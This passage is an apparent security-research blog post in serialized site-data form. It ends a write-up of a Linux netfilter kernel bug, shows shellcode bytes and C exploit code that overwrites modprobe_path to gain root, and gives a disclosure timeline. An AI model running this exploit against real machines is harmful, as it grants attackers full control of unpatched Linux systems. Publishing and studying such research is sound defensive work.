0x71",{"type":27,"tag":207,"props":67067,"children":67068},{"style":238},[67069],{"type":33,"value":1123},{"type":27,"tag":207,"props":67071,"children":67072},{"style":1325},[67073],{"type":33,"value":27331},{"type":27,"tag":207,"props":67075,"children":67076},{"style":55613},[67077],{"type":33,"value":67078},"\\x48\\xc7\\xc0\\x80\\x00\\x00",{"type":27,"tag":207,"props":67080,"children":67081},{"style":1325},[67082],{"type":33,"value":27331},{"type":27,"tag":207,"props":67084,"children":67085},{"style":238},[67086],{"type":33,"value":1123},{"type":27,"tag":207,"props":67088,"children":67089},{"style":232},[67090],{"type":33,"value":2693},{"type":27,"tag":207,"props":67092,"children":67093},{"style":238},[67094],{"type":33,"value":2222},{"type":27,"tag":207,"props":67096,"children":67097},{"style":226},[67098],{"type":33,"value":15856},{"type":27,"tag":207,"props":67100,"children":67101},{"style":232},[67102],{"type":33,"value":4680},{"type":27,"tag":207,"props":67104,"children":67105},{"style":226},[67106],{"type":33,"value":59920},{"type":27,"tag":207,"props":67108,"children":67109},{"class":209,"line":7900},[67110,67114,67118,67122,67127,67131,67135,67140,67144,67148,67152,67156,67160,67164],{"type":27,"tag":207,"props":67111,"children":67112},{"style":1335},[67113],{"type":33,"value":66403},{"type":27,"tag":207,"props":67115,"children":67116},{"style":238},[67117],{"type":33,"value":66345},{"type":27,"tag":207,"props":67119,"children":67120},{"style":226},[67121],{"type":33,"value":2227},{"type":27,"tag":207,"props":67123,"children":67124},{"style":232},[67125],{"type":33,"value":67126}," 0x78",{"type":27,"tag":207,"props":67128,"children":67129},{"style":238},[67130],{"type":33,"value":1123},{"type":27,"tag":207,"props":67132,"children":67133},{"style":1325},[67134],{"type":33,"value":27331},{"type":27,"tag":207,"props":67136,"children":67137},{"style":55613},[67138],{"type":33,"value":67139},"\\xff\\xe0",{"type":27,"tag":207,"props":67141,"children":67142},{"style":1325},[67143],{"type":33,"value":27331},{"type":27,"tag":207,"props":67145,"children":67146},{"style":238},[67147],{"type":33,"value":1123},{"type":27,"tag":207,"props":67149,"children":67150},{"style":232},[67151],{"type":33,"value":1744},{"type":27,"tag":207,"props":67153,"children":67154},{"style":238},[67155],{"type":33,"value":2222},{"type":27,"tag":207,"props":67157,"children":67158},{"style":226},[67159],{"type":33,"value":15856},{"type":27,"tag":207,"props":67161,"children":67162},{"style":232},[67163],{"type":33,"value":4680},{"type":27,"tag":207,"props":67165,"children":67166},{"style":238},[67167],{"type":33,"value":10449},{"type":27,"tag":207,"props":67169,"children":67170},{"class":209,"line":7909},[67171,67175,67179],{"type":27,"tag":207,"props":67172,"children":67173},{"style":376},[67174],{"type":33,"value":23019},{"type":27,"tag":207,"props":67176,"children":67177},{"style":214},[67178],{"type":33,"value":19746},{"type":27,"tag":207,"props":67180,"children":67181},{"style":238},[67182],{"type":33,"value":241},{"type":27,"tag":207,"props":67184,"children":67185},{"class":209,"line":7917},[67186],{"type":27,"tag":207,"props":67187,"children":67188},{"emptyLinePlaceholder":19},[67189],{"type":33,"value":2062},{"type":27,"tag":207,"props":67191,"children":67192},{"class":209,"line":7926},[67193,67197,67201],{"type":27,"tag":207,"props":67194,"children":67195},{"style":376},[67196],{"type":33,"value":8986},{"type":27,"tag":207,"props":67198,"children":67199},{"style":214},[67200],{"type":33,"value":16337},{"type":27,"tag":207,"props":67202,"children":67203},{"style":238},[67204],{"type":33,"value":241},{"type":27,"tag":207,"props":67206,"children":67207},{"class":209,"line":7934},[67208],{"type":27,"tag":207,"props":67209,"children":67210},{"style":238},[67211],{"type":33,"value":451},{"type":27,"tag":207,"props":67213,"children":67214},{"class":209,"line":7943},[67215],{"type":27,"tag":207,"props":67216,"children":67217},{"style":238},[67218],{"type":33,"value":17595},{"type":27,"tag":58,"props":67220,"children":67222},{"id":67221},"overwriting-modprobe_path",[67223,67225],{"type":33,"value":67224},"Overwriting ",{"type":27,"tag":84,"props":67226,"children":67228},{"className":67227},[],[67229],{"type":33,"value":65611},{"type":27,"tag":36,"props":67231,"children":67232},{},[67233,67235,67241],{"type":33,"value":67234},"Finding the ",{"type":27,"tag":84,"props":67236,"children":67238},{"className":67237},[],[67239],{"type":33,"value":67240},"/sbin/modprobe",{"type":33,"value":67242}," string in kernel memory and replacing it with a controlled value that points to a file we own finally becomes relatively trivial.",{"type":27,"tag":36,"props":67244,"children":67245},{},[67246,67248,67254],{"type":33,"value":67247},"A very well-known trick for this to work, although we are running in a chroot without being able to create files at the root filesystem, is using a memfd exposed through ",{"type":27,"tag":84,"props":67249,"children":67251},{"className":67250},[],[67252],{"type":33,"value":67253},"/proc/\u003Cpid>/fd/\u003Cn>.",{"type":33,"value":67255}," It's worth adding that, given that our pid outside the unprivileged namespace is unknown to us, we brute-force it.",{"type":27,"tag":101,"props":67257,"children":67259},{"className":8877,"code":67258,"language":8876,"meta":7,"style":7},"[...]\n puts(\"[*] overwrite modprobe_path\");\n for (int i = 0; i \u003C 4194304; i++)\n {\n pipebuf->page = modprobe_page;\n pipebuf->offset = modprobe_off;\n pipebuf->len = 0;\n for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n {\n if (write(sock[i][0], pipebuf, 1024 - 320) \u003C 0)\n {\n perror(\"[-] write(socket)\");\n break;\n }\n }\n\n memset(&data, 0, PAGE_SIZE);\n snprintf(fd_path, sizeof(fd_path), \"/proc/%i/fd/%i\", i, modprobe_fd);\n\n lseek(modprobe_fd, 0, SEEK_SET);\n dprintf(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);\n\n if (write(pfd[pipe_idx][1], fd_path, 32) \u003C 0)\n {\n perror(\"\\n[-] write(pipe)\");\n }\n\n if (check_modprobe(fd_path))\n {\n puts(\"[-] failed to overwrite modprobe\");\n break;\n }\n\n if (trigger_modprobe(status_fd))\n {\n puts(\"\\n[+] got root\");\n goto out;\n }\n\n for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n {\n if (read(sock[i][1], leak, 1024 - 320) \u003C 0)\n {\n perror(\"[-] read(socket)\");\n return -1;\n }\n }\n }\n puts(\"[-] fake modprobe failed\");\n[...]\n",[67260],{"type":27,"tag":84,"props":67261,"children":67262},{"__ignoreMap":7},[67263,67270,67292,67300,67307,67315,67323,67331,67339,67346,67354,67361,67399,67410,67417,67424,67431,67458,67489,67496,67518,67531,67538,67595,67602,67630,67637,67644,67665,67672,67693,67704,67711,67718,67739,67746,67774,67787,67794,67801,67850,67857,67925,67932,67953,67973,67980,67987,67994,68014],{"type":27,"tag":207,"props":67264,"children":67265},{"class":209,"line":210},[67266],{"type":27,"tag":207,"props":67267,"children":67268},{"style":238},[67269],{"type":33,"value":17595},{"type":27,"tag":207,"props":67271,"children":67272},{"class":209,"line":244},[67273,67278,67283,67288],{"type":27,"tag":207,"props":67274,"children":67275},{"style":238},[67276],{"type":33,"value":67277}," puts(\"[*] ",{"type":27,"tag":207,"props":67279,"children":67280},{"style":8920},[67281],{"type":33,"value":67282},"overwrite",{"type":27,"tag":207,"props":67284,"children":67285},{"style":8920},[67286],{"type":33,"value":67287}," modprobe_path",{"type":27,"tag":207,"props":67289,"children":67290},{"style":1325},[67291],{"type":33,"value":63526},{"type":27,"tag":207,"props":67293,"children":67294},{"class":209,"line":270},[67295],{"type":27,"tag":207,"props":67296,"children":67297},{"style":1325},[67298],{"type":33,"value":67299}," for (int i = 0; i \u003C 4194304; i++)\n",{"type":27,"tag":207,"props":67301,"children":67302},{"class":209,"line":296},[67303],{"type":27,"tag":207,"props":67304,"children":67305},{"style":1325},[67306],{"type":33,"value":36449},{"type":27,"tag":207,"props":67308,"children":67309},{"class":209,"line":445},[67310],{"type":27,"tag":207,"props":67311,"children":67312},{"style":1325},[67313],{"type":33,"value":67314}," pipebuf->page = modprobe_page;\n",{"type":27,"tag":207,"props":67316,"children":67317},{"class":209,"line":867},[67318],{"type":27,"tag":207,"props":67319,"children":67320},{"style":1325},[67321],{"type":33,"value":67322}," pipebuf->offset = modprobe_off;\n",{"type":27,"tag":207,"props":67324,"children":67325},{"class":209,"line":892},[67326],{"type":27,"tag":207,"props":67327,"children":67328},{"style":1325},[67329],{"type":33,"value":67330}," pipebuf->len = 0;\n",{"type":27,"tag":207,"props":67332,"children":67333},{"class":209,"line":1475},[67334],{"type":27,"tag":207,"props":67335,"children":67336},{"style":1325},[67337],{"type":33,"value":67338}," for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n",{"type":27,"tag":207,"props":67340,"children":67341},{"class":209,"line":2065},[67342],{"type":27,"tag":207,"props":67343,"children":67344},{"style":1325},[67345],{"type":33,"value":38919},{"type":27,"tag":207,"props":67347,"children":67348},{"class":209,"line":2092},[67349],{"type":27,"tag":207,"props":67350,"children":67351},{"style":1325},[67352],{"type":33,"value":67353}," if (write(sock[i][0], pipebuf, 1024 - 320) \u003C 0)\n",{"type":27,"tag":207,"props":67355,"children":67356},{"class":209,"line":2130},[67357],{"type":27,"tag":207,"props":67358,"children":67359},{"style":1325},[67360],{"type":33,"value":38955},{"type":27,"tag":207,"props":67362,"children":67363},{"class":209,"line":2168},[67364,67369,67373,67377,67381,67386,67390,67394],{"type":27,"tag":207,"props":67365,"children":67366},{"style":1325},[67367],{"type":33,"value":67368}," perror(\"",{"type":27,"tag":207,"props":67370,"children":67371},{"style":238},[67372],{"type":33,"value":11019},{"type":27,"tag":207,"props":67374,"children":67375},{"style":226},[67376],{"type":33,"value":11611},{"type":27,"tag":207,"props":67378,"children":67379},{"style":238},[67380],{"type":33,"value":15942},{"type":27,"tag":207,"props":67382,"children":67383},{"style":8920},[67384],{"type":33,"value":67385},"write",{"type":27,"tag":207,"props":67387,"children":67388},{"style":238},[67389],{"type":33,"value":1343},{"type":27,"tag":207,"props":67391,"children":67392},{"style":8920},[67393],{"type":33,"value":49183},{"type":27,"tag":207,"props":67395,"children":67396},{"style":238},[67397],{"type":33,"value":67398},")\");\n",{"type":27,"tag":207,"props":67400,"children":67401},{"class":209,"line":4095},[67402,67406],{"type":27,"tag":207,"props":67403,"children":67404},{"style":376},[67405],{"type":33,"value":66193},{"type":27,"tag":207,"props":67407,"children":67408},{"style":238},[67409],{"type":33,"value":241},{"type":27,"tag":207,"props":67411,"children":67412},{"class":209,"line":4103},[67413],{"type":27,"tag":207,"props":67414,"children":67415},{"style":238},[67416],{"type":33,"value":66118},{"type":27,"tag":207,"props":67418,"children":67419},{"class":209,"line":4154},[67420],{"type":27,"tag":207,"props":67421,"children":67422},{"style":238},[67423],{"type":33,"value":10637},{"type":27,"tag":207,"props":67425,"children":67426},{"class":209,"line":4203},[67427],{"type":27,"tag":207,"props":67428,"children":67429},{"emptyLinePlaceholder":19},[67430],{"type":33,"value":2062},{"type":27,"tag":207,"props":67432,"children":67433},{"class":209,"line":4249},[67434,67438,67442,67446,67450,67454],{"type":27,"tag":207,"props":67435,"children":67436},{"style":1335},[67437],{"type":33,"value":61853},{"type":27,"tag":207,"props":67439,"children":67440},{"style":238},[67441],{"type":33,"value":1343},{"type":27,"tag":207,"props":67443,"children":67444},{"style":226},[67445],{"type":33,"value":10398},{"type":27,"tag":207,"props":67447,"children":67448},{"style":238},[67449],{"type":33,"value":66004},{"type":27,"tag":207,"props":67451,"children":67452},{"style":232},[67453],{"type":33,"value":1660},{"type":27,"tag":207,"props":67455,"children":67456},{"style":238},[67457],{"type":33,"value":66013},{"type":27,"tag":207,"props":67459,"children":67460},{"class":209,"line":4290},[67461,67465,67470,67474,67479,67484],{"type":27,"tag":207,"props":67462,"children":67463},{"style":1335},[67464],{"type":33,"value":62553},{"type":27,"tag":207,"props":67466,"children":67467},{"style":238},[67468],{"type":33,"value":67469},"(fd_path, ",{"type":27,"tag":207,"props":67471,"children":67472},{"style":214},[67473],{"type":33,"value":62563},{"type":27,"tag":207,"props":67475,"children":67476},{"style":238},[67477],{"type":33,"value":67478},"(fd_path), ",{"type":27,"tag":207,"props":67480,"children":67481},{"style":1325},[67482],{"type":33,"value":67483},"\"/proc/%i/fd/%i\"",{"type":27,"tag":207,"props":67485,"children":67486},{"style":238},[67487],{"type":33,"value":67488},", i, modprobe_fd);\n",{"type":27,"tag":207,"props":67490,"children":67491},{"class":209,"line":4304},[67492],{"type":27,"tag":207,"props":67493,"children":67494},{"emptyLinePlaceholder":19},[67495],{"type":33,"value":2062},{"type":27,"tag":207,"props":67497,"children":67498},{"class":209,"line":5466},[67499,67504,67509,67513],{"type":27,"tag":207,"props":67500,"children":67501},{"style":1335},[67502],{"type":33,"value":67503}," lseek",{"type":27,"tag":207,"props":67505,"children":67506},{"style":238},[67507],{"type":33,"value":67508},"(modprobe_fd, ",{"type":27,"tag":207,"props":67510,"children":67511},{"style":232},[67512],{"type":33,"value":1660},{"type":27,"tag":207,"props":67514,"children":67515},{"style":238},[67516],{"type":33,"value":67517},", SEEK_SET);\n",{"type":27,"tag":207,"props":67519,"children":67520},{"class":209,"line":5530},[67521,67526],{"type":27,"tag":207,"props":67522,"children":67523},{"style":1335},[67524],{"type":33,"value":67525}," dprintf",{"type":27,"tag":207,"props":67527,"children":67528},{"style":238},[67529],{"type":33,"value":67530},"(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);\n",{"type":27,"tag":207,"props":67532,"children":67533},{"class":209,"line":7900},[67534],{"type":27,"tag":207,"props":67535,"children":67536},{"emptyLinePlaceholder":19},[67537],{"type":33,"value":2062},{"type":27,"tag":207,"props":67539,"children":67540},{"class":209,"line":7909},[67541,67545,67549,67553,67557,67561,67566,67570,67575,67579,67583,67587,67591],{"type":27,"tag":207,"props":67542,"children":67543},{"style":376},[67544],{"type":33,"value":10562},{"type":27,"tag":207,"props":67546,"children":67547},{"style":238},[67548],{"type":33,"value":686},{"type":27,"tag":207,"props":67550,"children":67551},{"style":1335},[67552],{"type":33,"value":67385},{"type":27,"tag":207,"props":67554,"children":67555},{"style":238},[67556],{"type":33,"value":1343},{"type":27,"tag":207,"props":67558,"children":67559},{"style":220},[67560],{"type":33,"value":66057},{"type":27,"tag":207,"props":67562,"children":67563},{"style":238},[67564],{"type":33,"value":67565},"[pipe_idx][",{"type":27,"tag":207,"props":67567,"children":67568},{"style":232},[67569],{"type":33,"value":1651},{"type":27,"tag":207,"props":67571,"children":67572},{"style":238},[67573],{"type":33,"value":67574},"], fd_path, ",{"type":27,"tag":207,"props":67576,"children":67577},{"style":232},[67578],{"type":33,"value":7139},{"type":27,"tag":207,"props":67580,"children":67581},{"style":238},[67582],{"type":33,"value":2222},{"type":27,"tag":207,"props":67584,"children":67585},{"style":226},[67586],{"type":33,"value":9257},{"type":27,"tag":207,"props":67588,"children":67589},{"style":232},[67590],{"type":33,"value":4680},{"type":27,"tag":207,"props":67592,"children":67593},{"style":238},[67594],{"type":33,"value":10449},{"type":27,"tag":207,"props":67596,"children":67597},{"class":209,"line":7917},[67598],{"type":27,"tag":207,"props":67599,"children":67600},{"style":238},[67601],{"type":33,"value":38919},{"type":27,"tag":207,"props":67603,"children":67604},{"class":209,"line":7926},[67605,67609,67613,67617,67621,67626],{"type":27,"tag":207,"props":67606,"children":67607},{"style":1335},[67608],{"type":33,"value":65130},{"type":27,"tag":207,"props":67610,"children":67611},{"style":238},[67612],{"type":33,"value":1343},{"type":27,"tag":207,"props":67614,"children":67615},{"style":1325},[67616],{"type":33,"value":27331},{"type":27,"tag":207,"props":67618,"children":67619},{"style":55613},[67620],{"type":33,"value":55616},{"type":27,"tag":207,"props":67622,"children":67623},{"style":1325},[67624],{"type":33,"value":67625},"[-] write(pipe)\"",{"type":27,"tag":207,"props":67627,"children":67628},{"style":238},[67629],{"type":33,"value":1455},{"type":27,"tag":207,"props":67631,"children":67632},{"class":209,"line":7934},[67633],{"type":27,"tag":207,"props":67634,"children":67635},{"style":238},[67636],{"type":33,"value":10637},{"type":27,"tag":207,"props":67638,"children":67639},{"class":209,"line":7943},[67640],{"type":27,"tag":207,"props":67641,"children":67642},{"emptyLinePlaceholder":19},[67643],{"type":33,"value":2062},{"type":27,"tag":207,"props":67645,"children":67646},{"class":209,"line":7952},[67647,67651,67655,67660],{"type":27,"tag":207,"props":67648,"children":67649},{"style":376},[67650],{"type":33,"value":10562},{"type":27,"tag":207,"props":67652,"children":67653},{"style":238},[67654],{"type":33,"value":686},{"type":27,"tag":207,"props":67656,"children":67657},{"style":1335},[67658],{"type":33,"value":67659},"check_modprobe",{"type":27,"tag":207,"props":67661,"children":67662},{"style":238},[67663],{"type":33,"value":67664},"(fd_path))\n",{"type":27,"tag":207,"props":67666,"children":67667},{"class":209,"line":7961},[67668],{"type":27,"tag":207,"props":67669,"children":67670},{"style":238},[67671],{"type":33,"value":38919},{"type":27,"tag":207,"props":67673,"children":67674},{"class":209,"line":7969},[67675,67680,67684,67689],{"type":27,"tag":207,"props":67676,"children":67677},{"style":1335},[67678],{"type":33,"value":67679}," puts",{"type":27,"tag":207,"props":67681,"children":67682},{"style":238},[67683],{"type":33,"value":1343},{"type":27,"tag":207,"props":67685,"children":67686},{"style":1325},[67687],{"type":33,"value":67688},"\"[-] failed to overwrite modprobe\"",{"type":27,"tag":207,"props":67690,"children":67691},{"style":238},[67692],{"type":33,"value":1455},{"type":27,"tag":207,"props":67694,"children":67695},{"class":209,"line":7978},[67696,67700],{"type":27,"tag":207,"props":67697,"children":67698},{"style":376},[67699],{"type":33,"value":10588},{"type":27,"tag":207,"props":67701,"children":67702},{"style":238},[67703],{"type":33,"value":241},{"type":27,"tag":207,"props":67705,"children":67706},{"class":209,"line":7987},[67707],{"type":27,"tag":207,"props":67708,"children":67709},{"style":238},[67710],{"type":33,"value":10637},{"type":27,"tag":207,"props":67712,"children":67713},{"class":209,"line":7996},[67714],{"type":27,"tag":207,"props":67715,"children":67716},{"emptyLinePlaceholder":19},[67717],{"type":33,"value":2062},{"type":27,"tag":207,"props":67719,"children":67720},{"class":209,"line":8005},[67721,67725,67729,67734],{"type":27,"tag":207,"props":67722,"children":67723},{"style":376},[67724],{"type":33,"value":10562},{"type":27,"tag":207,"props":67726,"children":67727},{"style":238},[67728],{"type":33,"value":686},{"type":27,"tag":207,"props":67730,"children":67731},{"style":1335},[67732],{"type":33,"value":67733},"trigger_modprobe",{"type":27,"tag":207,"props":67735,"children":67736},{"style":238},[67737],{"type":33,"value":67738},"(status_fd))\n",{"type":27,"tag":207,"props":67740,"children":67741},{"class":209,"line":8013},[67742],{"type":27,"tag":207,"props":67743,"children":67744},{"style":238},[67745],{"type":33,"value":38919},{"type":27,"tag":207,"props":67747,"children":67748},{"class":209,"line":8021},[67749,67753,67757,67761,67765,67770],{"type":27,"tag":207,"props":67750,"children":67751},{"style":1335},[67752],{"type":33,"value":67679},{"type":27,"tag":207,"props":67754,"children":67755},{"style":238},[67756],{"type":33,"value":1343},{"type":27,"tag":207,"props":67758,"children":67759},{"style":1325},[67760],{"type":33,"value":27331},{"type":27,"tag":207,"props":67762,"children":67763},{"style":55613},[67764],{"type":33,"value":55616},{"type":27,"tag":207,"props":67766,"children":67767},{"style":1325},[67768],{"type":33,"value":67769},"[+] got root\"",{"type":27,"tag":207,"props":67771,"children":67772},{"style":238},[67773],{"type":33,"value":1455},{"type":27,"tag":207,"props":67775,"children":67776},{"class":209,"line":8029},[67777,67782],{"type":27,"tag":207,"props":67778,"children":67779},{"style":376},[67780],{"type":33,"value":67781}," goto",{"type":27,"tag":207,"props":67783,"children":67784},{"style":238},[67785],{"type":33,"value":67786}," out;\n",{"type":27,"tag":207,"props":67788,"children":67789},{"class":209,"line":8037},[67790],{"type":27,"tag":207,"props":67791,"children":67792},{"style":238},[67793],{"type":33,"value":10637},{"type":27,"tag":207,"props":67795,"children":67796},{"class":209,"line":8046},[67797],{"type":27,"tag":207,"props":67798,"children":67799},{"emptyLinePlaceholder":19},[67800],{"type":33,"value":2062},{"type":27,"tag":207,"props":67802,"children":67803},{"class":209,"line":8055},[67804,67809,67813,67817,67821,67825,67829,67833,67837,67842,67846],{"type":27,"tag":207,"props":67805,"children":67806},{"style":376},[67807],{"type":33,"value":67808}," for",{"type":27,"tag":207,"props":67810,"children":67811},{"style":238},[67812],{"type":33,"value":686},{"type":27,"tag":207,"props":67814,"children":67815},{"style":214},[67816],{"type":33,"value":26317},{"type":27,"tag":207,"props":67818,"children":67819},{"style":238},[67820],{"type":33,"value":61780},{"type":27,"tag":207,"props":67822,"children":67823},{"style":226},[67824],{"type":33,"value":10380},{"type":27,"tag":207,"props":67826,"children":67827},{"style":232},[67828],{"type":33,"value":4680},{"type":27,"tag":207,"props":67830,"children":67831},{"style":238},[67832],{"type":33,"value":58472},{"type":27,"tag":207,"props":67834,"children":67835},{"style":226},[67836],{"type":33,"value":9257},{"type":27,"tag":207,"props":67838,"children":67839},{"style":238},[67840],{"type":33,"value":67841}," SKBUF_SPRAY; i",{"type":27,"tag":207,"props":67843,"children":67844},{"style":226},[67845],{"type":33,"value":4713},{"type":27,"tag":207,"props":67847,"children":67848},{"style":238},[67849],{"type":33,"value":10449},{"type":27,"tag":207,"props":67851,"children":67852},{"class":209,"line":8064},[67853],{"type":27,"tag":207,"props":67854,"children":67855},{"style":238},[67856],{"type":33,"value":38919},{"type":27,"tag":207,"props":67858,"children":67859},{"class":209,"line":8072},[67860,67864,67868,67873,67877,67882,67887,67891,67896,67900,67904,67909,67913,67917,67921],{"type":27,"tag":207,"props":67861,"children":67862},{"style":376},[67863],{"type":33,"value":66034},{"type":27,"tag":207,"props":67865,"children":67866},{"style":238},[67867],{"type":33,"value":686},{"type":27,"tag":207,"props":67869,"children":67870},{"style":1335},[67871],{"type":33,"value":67872},"read",{"type":27,"tag":207,"props":67874,"children":67875},{"style":238},[67876],{"type":33,"value":1343},{"type":27,"tag":207,"props":67878,"children":67879},{"style":220},[67880],{"type":33,"value":67881},"sock",{"type":27,"tag":207,"props":67883,"children":67884},{"style":238},[67885],{"type":33,"value":67886},"[i][",{"type":27,"tag":207,"props":67888,"children":67889},{"style":232},[67890],{"type":33,"value":1651},{"type":27,"tag":207,"props":67892,"children":67893},{"style":238},[67894],{"type":33,"value":67895},"], leak, ",{"type":27,"tag":207,"props":67897,"children":67898},{"style":232},[67899],{"type":33,"value":65381},{"type":27,"tag":207,"props":67901,"children":67902},{"style":226},[67903],{"type":33,"value":544},{"type":27,"tag":207,"props":67905,"children":67906},{"style":232},[67907],{"type":33,"value":67908}," 320",{"type":27,"tag":207,"props":67910,"children":67911},{"style":238},[67912],{"type":33,"value":2222},{"type":27,"tag":207,"props":67914,"children":67915},{"style":226},[67916],{"type":33,"value":9257},{"type":27,"tag":207,"props":67918,"children":67919},{"style":232},[67920],{"type":33,"value":4680},{"type":27,"tag":207,"props":67922,"children":67923},{"style":238},[67924],{"type":33,"value":10449},{"type":27,"tag":207,"props":67926,"children":67927},{"class":209,"line":8081},[67928],{"type":27,"tag":207,"props":67929,"children":67930},{"style":238},[67931],{"type":33,"value":38955},{"type":27,"tag":207,"props":67933,"children":67934},{"class":209,"line":8090},[67935,67940,67944,67949],{"type":27,"tag":207,"props":67936,"children":67937},{"style":1335},[67938],{"type":33,"value":67939}," perror",{"type":27,"tag":207,"props":67941,"children":67942},{"style":238},[67943],{"type":33,"value":1343},{"type":27,"tag":207,"props":67945,"children":67946},{"style":1325},[67947],{"type":33,"value":67948},"\"[-] read(socket)\"",{"type":27,"tag":207,"props":67950,"children":67951},{"style":238},[67952],{"type":33,"value":1455},{"type":27,"tag":207,"props":67954,"children":67955},{"class":209,"line":8098},[67956,67961,67965,67969],{"type":27,"tag":207,"props":67957,"children":67958},{"style":376},[67959],{"type":33,"value":67960}," return",{"type":27,"tag":207,"props":67962,"children":67963},{"style":226},[67964],{"type":33,"value":544},{"type":27,"tag":207,"props":67966,"children":67967},{"style":232},[67968],{"type":33,"value":1651},{"type":27,"tag":207,"props":67970,"children":67971},{"style":238},[67972],{"type":33,"value":241},{"type":27,"tag":207,"props":67974,"children":67975},{"class":209,"line":8107},[67976],{"type":27,"tag":207,"props":67977,"children":67978},{"style":238},[67979],{"type":33,"value":66118},{"type":27,"tag":207,"props":67981,"children":67982},{"class":209,"line":8116},[67983],{"type":27,"tag":207,"props":67984,"children":67985},{"style":238},[67986],{"type":33,"value":10637},{"type":27,"tag":207,"props":67988,"children":67989},{"class":209,"line":8125},[67990],{"type":27,"tag":207,"props":67991,"children":67992},{"style":238},[67993],{"type":33,"value":10645},{"type":27,"tag":207,"props":67995,"children":67996},{"class":209,"line":8133},[67997,68001,68005,68010],{"type":27,"tag":207,"props":67998,"children":67999},{"style":1335},[68000],{"type":33,"value":62742},{"type":27,"tag":207,"props":68002,"children":68003},{"style":238},[68004],{"type":33,"value":1343},{"type":27,"tag":207,"props":68006,"children":68007},{"style":1325},[68008],{"type":33,"value":68009},"\"[-] fake modprobe failed\"",{"type":27,"tag":207,"props":68011,"children":68012},{"style":238},[68013],{"type":33,"value":1455},{"type":27,"tag":207,"props":68015,"children":68016},{"class":209,"line":8142},[68017],{"type":27,"tag":207,"props":68018,"children":68019},{"style":238},[68020],{"type":33,"value":17595},{"type":27,"tag":36,"props":68022,"children":68023},{},[68024,68026,68033],{"type":33,"value":68025},"This trick has already been throughly detailed by ",{"type":27,"tag":47,"props":68027,"children":68030},{"href":68028,"rel":68029},"https://pwning.tech/nftables/#28-overwriting-modprobepath",[51],[68031],{"type":33,"value":68032},"lau",{"type":33,"value":68034},", so we won't go much more into it.",{"type":27,"tag":58,"props":68036,"children":68038},{"id":68037},"universal-exploit-demo",[68039],{"type":33,"value":68040},"Universal exploit demo",{"type":27,"tag":36,"props":68042,"children":68043},{},[68044,68046,68052],{"type":33,"value":68045},"{%youtube tjbp4Mtfo8w %}\nYou can find the complete universal exploit in our ",{"type":27,"tag":47,"props":68047,"children":68050},{"href":68048,"rel":68049},"https://github.com/otter-sec/OtterRoot/blob/master/universal/exploit.c",[51],[68051],{"type":33,"value":64649},{"type":33,"value":1041},{"type":27,"tag":28,"props":68054,"children":68056},{"id":68055},"disclosure-timeline",[68057],{"type":33,"value":68058},"Disclosure Timeline",{"type":27,"tag":1228,"props":68060,"children":68061},{},[68062,68067,68072,68077,68082],{"type":27,"tag":1232,"props":68063,"children":68064},{},[68065],{"type":33,"value":68066},"March 21st -- Patch made public",{"type":27,"tag":1232,"props":68068,"children":68069},{},[68070],{"type":33,"value":68071},"March 23rd -- Scrolled through commits and found the bug fix.",{"type":27,"tag":1232,"props":68073,"children":68074},{},[68075],{"type":33,"value":68076},"March 24th -- Wrote KernelCTF exploit",{"type":27,"tag":1232,"props":68078,"children":68079},{},[68080],{"type":33,"value":68081},"March 26th -- Wrote Universal exploit",{"type":27,"tag":1232,"props":68083,"children":68084},{},[68085],{"type":33,"value":68086},"May 23rd -- Patch landed on Ubuntu and Debian",{"type":27,"tag":36,"props":68088,"children":68089},{},[68090],{"type":33,"value":68091},"Note that the universal exploit was alive for roughly 2 months against popular distros.",{"type":27,"tag":28,"props":68093,"children":68094},{"id":10112},[68095],{"type":33,"value":10115},{"type":27,"tag":36,"props":68097,"children":68098},{},[68099],{"type":33,"value":68100},"In this post, I have discussed how a bug fixed by a commit freshly made public can be used to exploit the latest stable releases of the kernel and maintain 0day-like primitives for an extended period. I've also discussed two different paths to exploit the vulnerability: one that I used to exploit the KernelCTF instance and retrieve the flag and a second one that I used to craft a universal exploit binary that works stably in all tested targets without needing to be adapted or even recompiled.",{"type":27,"tag":36,"props":68102,"children":68103},{},[68104],{"type":33,"value":68105},"What we have observed is not novel; despite the efforts and progress made by the Linux community to improve kernel security, it's been made evident that the supply of exploitable bugs is still virtually unlimited and that the open-source patch gap is long enough to maintain capabilities that are live.",{"type":27,"tag":10127,"props":68107,"children":68108},{},[68109],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":68111},[68112,68115,68118,68121,68122,68132,68140,68141],{"id":57806,"depth":244,"text":57809,"children":68113},[68114],{"id":57827,"depth":270,"text":57830},{"id":57870,"depth":244,"text":57870,"children":68116},[68117],{"id":57917,"depth":270,"text":57920},{"id":57975,"depth":244,"text":57978,"children":68119},[68120],{"id":59135,"depth":270,"text":59138},{"id":61010,"depth":244,"text":61013},{"id":61412,"depth":244,"text":61415,"children":68123},[68124,68125,68126,68128,68129,68130,68131],{"id":61439,"depth":270,"text":61442},{"id":62320,"depth":270,"text":62323},{"id":62906,"depth":270,"text":68127},"Leaking self pointer of nft_object",{"id":63303,"depth":270,"text":63306},{"id":63816,"depth":270,"text":63819},{"id":63946,"depth":270,"text":63604},{"id":64630,"depth":270,"text":64633},{"id":64653,"depth":244,"text":64656,"children":68133},[68134,68135,68136,68137,68139],{"id":64664,"depth":270,"text":64667},{"id":65521,"depth":270,"text":65524},{"id":65597,"depth":270,"text":65600},{"id":67221,"depth":270,"text":68138},"Overwriting modprobe_path",{"id":68037,"depth":270,"text":68040},{"id":68055,"depth":244,"text":68058},{"id":10112,"depth":244,"text":10115},"content:blog:2024-11-25-netfilter-universal-root-1-day.md","blog/2024-11-25-netfilter-universal-root-1-day.md","blog/2024-11-25-netfilter-universal-root-1-day",{"_path":68146,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":68147,"description":68148,"image":68149,"date":68151,"isFeatured":19,"onBlogPage":19,"tags":68152,"body":68153,"_type":10152,"_id":74871,"_source":10154,"_file":74872,"_stem":74873,"_extension":10157},"/blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets","Hitchhiker's Guide to Aptos Fungible Assets","We take a deep dive into Aptos’ implementation of fungible assets, exploring the intricacies hidden within its functions, objects, and interactions. While the Fungible Asset model was designed to address the limitations and security flaws of the legacy Coin standard, it also introduced new challenges and vulnerabilities that developers should be aware 